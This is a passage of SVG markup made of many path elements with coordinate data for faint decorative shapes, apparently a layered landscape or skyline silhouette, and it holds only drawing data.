d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          